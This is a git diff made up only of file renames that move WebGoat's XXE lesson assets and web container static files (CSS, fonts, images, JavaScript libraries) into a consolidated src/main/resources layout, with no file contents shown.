diff --git a/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/xxe/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/xxe/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/xxe/src/main/resources/images/avatar1.png b/src/main/resources/lessons/xxe/images/avatar1.png
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/avatar1.png
rename to src/main/resources/lessons/xxe/images/avatar1.png
diff --git a/webgoat-lessons/xxe/src/main/resources/images/cat.jpg b/src/main/resources/lessons/xxe/images/cat.jpg
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/cat.jpg
rename to src/main/resources/lessons/xxe/images/cat.jpg
diff --git a/webgoat-lessons/xxe/src/main/resources/images/etc_password.png b/src/main/resources/lessons/xxe/images/etc_password.png
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/etc_password.png
rename to src/main/resources/lessons/xxe/images/etc_password.png
diff --git a/webgoat-lessons/xxe/src/main/resources/images/example.dtd b/src/main/resources/lessons/xxe/images/example.dtd
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/example.dtd
rename to src/main/resources/lessons/xxe/images/example.dtd
diff --git a/webgoat-lessons/xxe/src/main/resources/images/sonar-issue-xxe.png b/src/main/resources/lessons/xxe/images/sonar-issue-xxe.png
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/sonar-issue-xxe.png
rename to src/main/resources/lessons/xxe/images/sonar-issue-xxe.png
diff --git a/webgoat-lessons/xxe/src/main/resources/images/sonar-issues.png b/src/main/resources/lessons/xxe/images/sonar-issues.png
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/sonar-issues.png
rename to src/main/resources/lessons/xxe/images/sonar-issues.png
diff --git a/webgoat-lessons/xxe/src/main/resources/images/wolf-enabled.png b/src/main/resources/lessons/xxe/images/wolf-enabled.png
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/wolf-enabled.png
rename to src/main/resources/lessons/xxe/images/wolf-enabled.png
diff --git a/webgoat-lessons/xxe/src/main/resources/images/xxe-parser-java.png b/src/main/resources/lessons/xxe/images/xxe-parser-java.png
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/xxe-parser-java.png
rename to src/main/resources/lessons/xxe/images/xxe-parser-java.png
diff --git a/webgoat-lessons/xxe/src/main/resources/images/xxe-parser.png b/src/main/resources/lessons/xxe/images/xxe-parser.png
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/xxe-parser.png
rename to src/main/resources/lessons/xxe/images/xxe-parser.png
diff --git a/webgoat-lessons/xxe/src/main/resources/images/xxe-suggested-fix.png b/src/main/resources/lessons/xxe/images/xxe-suggested-fix.png
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/images/xxe-suggested-fix.png
rename to src/main/resources/lessons/xxe/images/xxe-suggested-fix.png
diff --git a/webgoat-lessons/xxe/src/main/resources/js/xxe.js b/src/main/resources/lessons/xxe/js/xxe.js
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/js/xxe.js
rename to src/main/resources/lessons/xxe/js/xxe.js
diff --git a/webgoat-lessons/xxe/src/main/resources/secret.txt b/src/main/resources/lessons/xxe/secret.txt
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/secret.txt
rename to src/main/resources/lessons/xxe/secret.txt
diff --git a/webgoat-container/src/main/resources/static/css/animate.css b/src/main/resources/webgoat/static/css/animate.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/animate.css
rename to src/main/resources/webgoat/static/css/animate.css
diff --git a/webgoat-container/src/main/resources/static/css/asciidoctor-default.css b/src/main/resources/webgoat/static/css/asciidoctor-default.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/asciidoctor-default.css
rename to src/main/resources/webgoat/static/css/asciidoctor-default.css
diff --git a/webgoat-container/src/main/resources/static/css/coderay.css b/src/main/resources/webgoat/static/css/coderay.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/coderay.css
rename to src/main/resources/webgoat/static/css/coderay.css
diff --git a/webgoat-container/src/main/resources/static/css/font-awesome.min.css b/src/main/resources/webgoat/static/css/font-awesome.min.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/font-awesome.min.css
rename to src/main/resources/webgoat/static/css/font-awesome.min.css
diff --git a/webgoat-container/src/main/resources/static/css/img/appseceu-17.png b/src/main/resources/webgoat/static/css/img/appseceu-17.png
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/img/appseceu-17.png
rename to src/main/resources/webgoat/static/css/img/appseceu-17.png
diff --git a/webgoat-container/src/main/resources/static/css/img/favicon.ico b/src/main/resources/webgoat/static/css/img/favicon.ico
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/img/favicon.ico
rename to src/main/resources/webgoat/static/css/img/favicon.ico
diff --git a/webgoat-container/src/main/resources/static/css/img/logo.png b/src/main/resources/webgoat/static/css/img/logo.png
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/img/logo.png
rename to src/main/resources/webgoat/static/css/img/logo.png
diff --git a/webgoat-container/src/main/resources/static/css/img/logoBG.jpg b/src/main/resources/webgoat/static/css/img/logoBG.jpg
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/img/logoBG.jpg
rename to src/main/resources/webgoat/static/css/img/logoBG.jpg
diff --git a/webgoat-container/src/main/resources/static/css/img/owasp_logo.jpg b/src/main/resources/webgoat/static/css/img/owasp_logo.jpg
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/img/owasp_logo.jpg
rename to src/main/resources/webgoat/static/css/img/owasp_logo.jpg
diff --git a/webgoat-container/src/main/resources/static/css/img/solution.svg b/src/main/resources/webgoat/static/css/img/solution.svg
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/img/solution.svg
rename to src/main/resources/webgoat/static/css/img/solution.svg
diff --git a/webgoat-container/src/main/resources/static/css/img/webBg.png b/src/main/resources/webgoat/static/css/img/webBg.png
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/img/webBg.png
rename to src/main/resources/webgoat/static/css/img/webBg.png
diff --git a/webwolf/src/main/resources/static/images/wolf.svg b/src/main/resources/webgoat/static/css/img/wolf.svg
similarity index 100%
rename from webwolf/src/main/resources/static/images/wolf.svg
rename to src/main/resources/webgoat/static/css/img/wolf.svg
diff --git a/webgoat-container/src/main/resources/static/css/layers.css b/src/main/resources/webgoat/static/css/layers.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/layers.css
rename to src/main/resources/webgoat/static/css/layers.css
diff --git a/webgoat-container/src/main/resources/static/css/main.css b/src/main/resources/webgoat/static/css/main.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/main.css
rename to src/main/resources/webgoat/static/css/main.css
diff --git a/webgoat-container/src/main/resources/static/css/menu.css b/src/main/resources/webgoat/static/css/menu.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/menu.css
rename to src/main/resources/webgoat/static/css/menu.css
diff --git a/webgoat-lessons/sql-injection/src/main/resources/css/quiz.css b/src/main/resources/webgoat/static/css/quiz.css
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/css/quiz.css
rename to src/main/resources/webgoat/static/css/quiz.css
diff --git a/webgoat-container/src/main/resources/static/css/webgoat.css b/src/main/resources/webgoat/static/css/webgoat.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/webgoat.css
rename to src/main/resources/webgoat/static/css/webgoat.css
diff --git a/webgoat-container/src/main/resources/static/fonts/FontAwesome.otf b/src/main/resources/webgoat/static/fonts/FontAwesome.otf
similarity index 100%
rename from webgoat-container/src/main/resources/static/fonts/FontAwesome.otf
rename to src/main/resources/webgoat/static/fonts/FontAwesome.otf
diff --git a/webgoat-container/src/main/resources/static/fonts/fontawesome-webfont.eot b/src/main/resources/webgoat/static/fonts/fontawesome-webfont.eot
similarity index 100%
rename from webgoat-container/src/main/resources/static/fonts/fontawesome-webfont.eot
rename to src/main/resources/webgoat/static/fonts/fontawesome-webfont.eot
diff --git a/webgoat-container/src/main/resources/static/fonts/fontawesome-webfont.svg b/src/main/resources/webgoat/static/fonts/fontawesome-webfont.svg
similarity index 100%
rename from webgoat-container/src/main/resources/static/fonts/fontawesome-webfont.svg
rename to src/main/resources/webgoat/static/fonts/fontawesome-webfont.svg
diff --git a/webgoat-container/src/main/resources/static/fonts/fontawesome-webfont.ttf b/src/main/resources/webgoat/static/fonts/fontawesome-webfont.ttf
similarity index 100%
rename from webgoat-container/src/main/resources/static/fonts/fontawesome-webfont.ttf
rename to src/main/resources/webgoat/static/fonts/fontawesome-webfont.ttf
diff --git a/webgoat-container/src/main/resources/static/fonts/fontawesome-webfont.woff b/src/main/resources/webgoat/static/fonts/fontawesome-webfont.woff
similarity index 100%
rename from webgoat-container/src/main/resources/static/fonts/fontawesome-webfont.woff
rename to src/main/resources/webgoat/static/fonts/fontawesome-webfont.woff
diff --git a/webgoat-container/src/main/resources/static/js/application.js b/src/main/resources/webgoat/static/js/application.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/application.js
rename to src/main/resources/webgoat/static/js/application.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/controller/LessonController.js b/src/main/resources/webgoat/static/js/goatApp/controller/LessonController.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/controller/LessonController.js
rename to src/main/resources/webgoat/static/js/goatApp/controller/LessonController.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/controller/MenuController.js b/src/main/resources/webgoat/static/js/goatApp/controller/MenuController.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/controller/MenuController.js
rename to src/main/resources/webgoat/static/js/goatApp/controller/MenuController.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/goatApp.js b/src/main/resources/webgoat/static/js/goatApp/goatApp.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/goatApp.js
rename to src/main/resources/webgoat/static/js/goatApp/goatApp.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/AssignmentStatusModel.js b/src/main/resources/webgoat/static/js/goatApp/model/AssignmentStatusModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/AssignmentStatusModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/AssignmentStatusModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/FlagModel.js b/src/main/resources/webgoat/static/js/goatApp/model/FlagModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/FlagModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/FlagModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/FlagsCollection.js b/src/main/resources/webgoat/static/js/goatApp/model/FlagsCollection.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/FlagsCollection.js
rename to src/main/resources/webgoat/static/js/goatApp/model/FlagsCollection.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/HTMLContentModel.js b/src/main/resources/webgoat/static/js/goatApp/model/HTMLContentModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/HTMLContentModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/HTMLContentModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/HintCollection.js b/src/main/resources/webgoat/static/js/goatApp/model/HintCollection.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/HintCollection.js
rename to src/main/resources/webgoat/static/js/goatApp/model/HintCollection.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/HintModel.js b/src/main/resources/webgoat/static/js/goatApp/model/HintModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/HintModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/HintModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/LabelDebugModel.js b/src/main/resources/webgoat/static/js/goatApp/model/LabelDebugModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/LabelDebugModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/LabelDebugModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/LessonContentModel.js b/src/main/resources/webgoat/static/js/goatApp/model/LessonContentModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/LessonContentModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/LessonContentModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/LessonInfoModel.js b/src/main/resources/webgoat/static/js/goatApp/model/LessonInfoModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/LessonInfoModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/LessonInfoModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/LessonOverviewCollection.js b/src/main/resources/webgoat/static/js/goatApp/model/LessonOverviewCollection.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/LessonOverviewCollection.js
rename to src/main/resources/webgoat/static/js/goatApp/model/LessonOverviewCollection.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/MenuCollection.js b/src/main/resources/webgoat/static/js/goatApp/model/MenuCollection.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/MenuCollection.js
rename to src/main/resources/webgoat/static/js/goatApp/model/MenuCollection.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/MenuData.js b/src/main/resources/webgoat/static/js/goatApp/model/MenuData.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/MenuData.js
rename to src/main/resources/webgoat/static/js/goatApp/model/MenuData.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/MenuModel.js b/src/main/resources/webgoat/static/js/goatApp/model/MenuModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/MenuModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/MenuModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/model/ReportCardModel.js b/src/main/resources/webgoat/static/js/goatApp/model/ReportCardModel.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/model/ReportCardModel.js
rename to src/main/resources/webgoat/static/js/goatApp/model/ReportCardModel.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/scoreboardApp.js b/src/main/resources/webgoat/static/js/goatApp/scoreboardApp.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/scoreboardApp.js
rename to src/main/resources/webgoat/static/js/goatApp/scoreboardApp.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/support/CustomGoat.js b/src/main/resources/webgoat/static/js/goatApp/support/CustomGoat.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/support/CustomGoat.js
rename to src/main/resources/webgoat/static/js/goatApp/support/CustomGoat.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/support/GoatUtils.js b/src/main/resources/webgoat/static/js/goatApp/support/GoatUtils.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/support/GoatUtils.js
rename to src/main/resources/webgoat/static/js/goatApp/support/GoatUtils.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/support/goatAsyncErrorHandler.js b/src/main/resources/webgoat/static/js/goatApp/support/goatAsyncErrorHandler.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/support/goatAsyncErrorHandler.js
rename to src/main/resources/webgoat/static/js/goatApp/support/goatAsyncErrorHandler.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/support/goatConstants.js b/src/main/resources/webgoat/static/js/goatApp/support/goatConstants.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/support/goatConstants.js
rename to src/main/resources/webgoat/static/js/goatApp/support/goatConstants.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/templates/lesson_overview.html b/src/main/resources/webgoat/static/js/goatApp/templates/lesson_overview.html
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/templates/lesson_overview.html
rename to src/main/resources/webgoat/static/js/goatApp/templates/lesson_overview.html
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/templates/paging_controls.html b/src/main/resources/webgoat/static/js/goatApp/templates/paging_controls.html
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/templates/paging_controls.html
rename to src/main/resources/webgoat/static/js/goatApp/templates/paging_controls.html
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/templates/report_card.html b/src/main/resources/webgoat/static/js/goatApp/templates/report_card.html
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/templates/report_card.html
rename to src/main/resources/webgoat/static/js/goatApp/templates/report_card.html
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/templates/scoreboard.html b/src/main/resources/webgoat/static/js/goatApp/templates/scoreboard.html
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/templates/scoreboard.html
rename to src/main/resources/webgoat/static/js/goatApp/templates/scoreboard.html
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/ErrorNotificationView.js b/src/main/resources/webgoat/static/js/goatApp/view/ErrorNotificationView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/ErrorNotificationView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/ErrorNotificationView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/GoatRouter.js b/src/main/resources/webgoat/static/js/goatApp/view/GoatRouter.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/GoatRouter.js
rename to src/main/resources/webgoat/static/js/goatApp/view/GoatRouter.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/HelpControlsView.js b/src/main/resources/webgoat/static/js/goatApp/view/HelpControlsView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/HelpControlsView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/HelpControlsView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/HintView.js b/src/main/resources/webgoat/static/js/goatApp/view/HintView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/HintView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/HintView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js b/src/main/resources/webgoat/static/js/goatApp/view/LessonContentView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/LessonContentView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/MenuButtonView.js b/src/main/resources/webgoat/static/js/goatApp/view/MenuButtonView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/MenuButtonView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/MenuButtonView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/MenuItemView.js b/src/main/resources/webgoat/static/js/goatApp/view/MenuItemView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/MenuItemView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/MenuItemView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js b/src/main/resources/webgoat/static/js/goatApp/view/MenuView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/MenuView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/PaginationControlView.js b/src/main/resources/webgoat/static/js/goatApp/view/PaginationControlView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/PaginationControlView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/PaginationControlView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/ReportCardView.js b/src/main/resources/webgoat/static/js/goatApp/view/ReportCardView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/ReportCardView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/ReportCardView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/ScoreboardView.js b/src/main/resources/webgoat/static/js/goatApp/view/ScoreboardView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/ScoreboardView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/ScoreboardView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/TitleView.js b/src/main/resources/webgoat/static/js/goatApp/view/TitleView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/TitleView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/TitleView.js
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/UserAndInfoView.js b/src/main/resources/webgoat/static/js/goatApp/view/UserAndInfoView.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/goatApp/view/UserAndInfoView.js
rename to src/main/resources/webgoat/static/js/goatApp/view/UserAndInfoView.js
diff --git a/webgoat-container/src/main/resources/static/js/jquery/jquery-1.10.2.min.js b/src/main/resources/webgoat/static/js/jquery/jquery-1.10.2.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/jquery/jquery-1.10.2.min.js
rename to src/main/resources/webgoat/static/js/jquery/jquery-1.10.2.min.js
diff --git a/webgoat-container/src/main/resources/static/js/jquery/jquery-ui-1.10.4.custom.min.js b/src/main/resources/webgoat/static/js/jquery/jquery-ui-1.10.4.custom.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/jquery/jquery-ui-1.10.4.custom.min.js
rename to src/main/resources/webgoat/static/js/jquery/jquery-ui-1.10.4.custom.min.js
diff --git a/webgoat-container/src/main/resources/static/js/jquery_form/jquery.form.js b/src/main/resources/webgoat/static/js/jquery_form/jquery.form.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/jquery_form/jquery.form.js
rename to src/main/resources/webgoat/static/js/jquery_form/jquery.form.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/ace.js b/src/main/resources/webgoat/static/js/libs/ace.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/ace.js
rename to src/main/resources/webgoat/static/js/libs/ace.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/backbone-min.js b/src/main/resources/webgoat/static/js/libs/backbone-min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/backbone-min.js
rename to src/main/resources/webgoat/static/js/libs/backbone-min.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/bootstrap.min.js b/src/main/resources/webgoat/static/js/libs/bootstrap.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/bootstrap.min.js
rename to src/main/resources/webgoat/static/js/libs/bootstrap.min.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/jquery-2.1.4.min.js b/src/main/resources/webgoat/static/js/libs/jquery-2.1.4.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/jquery-2.1.4.min.js
rename to src/main/resources/webgoat/static/js/libs/jquery-2.1.4.min.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/jquery-base.js b/src/main/resources/webgoat/static/js/libs/jquery-base.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/jquery-base.js
rename to src/main/resources/webgoat/static/js/libs/jquery-base.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/jquery-ui-1.10.4.js b/src/main/resources/webgoat/static/js/libs/jquery-ui-1.10.4.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/jquery-ui-1.10.4.js
rename to src/main/resources/webgoat/static/js/libs/jquery-ui-1.10.4.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/jquery-ui.min.js b/src/main/resources/webgoat/static/js/libs/jquery-ui.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/jquery-ui.min.js
rename to src/main/resources/webgoat/static/js/libs/jquery-ui.min.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/jquery-vuln.js b/src/main/resources/webgoat/static/js/libs/jquery-vuln.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/jquery-vuln.js
rename to src/main/resources/webgoat/static/js/libs/jquery-vuln.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/jquery.form.js b/src/main/resources/webgoat/static/js/libs/jquery.form.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/jquery.form.js
rename to src/main/resources/webgoat/static/js/libs/jquery.form.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/jquery.min.js b/src/main/resources/webgoat/static/js/libs/jquery.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/jquery.min.js
rename to src/main/resources/webgoat/static/js/libs/jquery.min.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/mode-java.js b/src/main/resources/webgoat/static/js/libs/mode-java.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/mode-java.js
rename to src/main/resources/webgoat/static/js/libs/mode-java.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/polyglot.min.js b/src/main/resources/webgoat/static/js/libs/polyglot.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/polyglot.min.js
rename to src/main/resources/webgoat/static/js/libs/polyglot.min.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/require.min.js b/src/main/resources/webgoat/static/js/libs/require.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/require.min.js
rename to src/main/resources/webgoat/static/js/libs/require.min.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/text.js b/src/main/resources/webgoat/static/js/libs/text.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/text.js
rename to src/main/resources/webgoat/static/js/libs/text.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/theme-monokai.js b/src/main/resources/webgoat/static/js/libs/theme-monokai.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/theme-monokai.js
rename to src/main/resources/webgoat/static/js/libs/theme-monokai.js
diff --git a/webgoat-container/src/main/resources/static/js/libs/underscore-min.js b/src/main/resources/webgoat/static/js/libs/underscore-min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/libs/underscore-min.js
rename to src/main/resources/webgoat/static/js/libs/underscore-min.js
diff --git a/webgoat-container/src/main/resources/static/js/main.js b/src/main/resources/webgoat/static/js/main.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/main.js
rename to src/main/resources/webgoat/static/js/main.js
diff --git a/webgoat-container/src/main/resources/static/js/modernizr.min.js b/src/main/resources/webgoat/static/js/modernizr.min.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/modernizr.min.js
rename to src/main/resources/webgoat/static/js/modernizr.min.js
diff --git a/webgoat-container/src/main/resources/static/js/quiz.js b/src/main/resources/webgoat/static/js/quiz.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/quiz.js
rename to src/main/resources/webgoat/static/js/quiz.js
diff --git a/webgoat-container/src/main/resources/static/js/scoreboard.js b/src/main/resources/webgoat/static/js/scoreboard.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/scoreboard.js
rename to src/main/resources/webgoat/static/js/scoreboard.js
diff --git a/webgoat-container/src/main/resources/static/js/toggle.js b/src/main/resources/webgoat/static/js/toggle.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/js/toggle.js
rename to src/main/resources/webgoat/static/js/toggle.js
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap-slider/css/slider.css b/src/main/resources/webgoat/static/plugins/bootstrap-slider/css/slider.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap-slider/css/slider.css
rename to src/main/resources/webgoat/static/plugins/bootstrap-slider/css/slider.css
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap-slider/js/bootstrap-slider.js b/src/main/resources/webgoat/static/plugins/bootstrap-slider/js/bootstrap-slider.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap-slider/js/bootstrap-slider.js
rename to src/main/resources/webgoat/static/plugins/bootstrap-slider/js/bootstrap-slider.js
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap-wysihtml5/css/bootstrap-wysihtml5.css b/src/main/resources/webgoat/static/plugins/bootstrap-wysihtml5/css/bootstrap-wysihtml5.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap-wysihtml5/css/bootstrap-wysihtml5.css
rename to src/main/resources/webgoat/static/plugins/bootstrap-wysihtml5/css/bootstrap-wysihtml5.css
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap-wysihtml5/css/bootstrap3-wysiwyg5-color.css b/src/main/resources/webgoat/static/plugins/bootstrap-wysihtml5/css/bootstrap3-wysiwyg5-color.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap-wysihtml5/css/bootstrap3-wysiwyg5-color.css
rename to src/main/resources/webgoat/static/plugins/bootstrap-wysihtml5/css/bootstrap3-wysiwyg5-color.css
diff --git a/webgoat-container/src/main/resources/static/plugins/bootstrap-wysihtml5/js/bootstrap3-wysihtml5.js b/src/main/resources/webgoat/static/plugins/bootstrap-wysihtml5/js/bootstrap3-wysihtml5.js
similarity index 100%
rename from webgoat-container/src/main/resources/static/plugins/bootstrap-wysihtml5/js/bootstrap3-wysihtml5.js
rename to src/main/resources/webgoat/static/plugins/bootstrap-wysihtml5/js/bootstrap3-wysihtml5.js
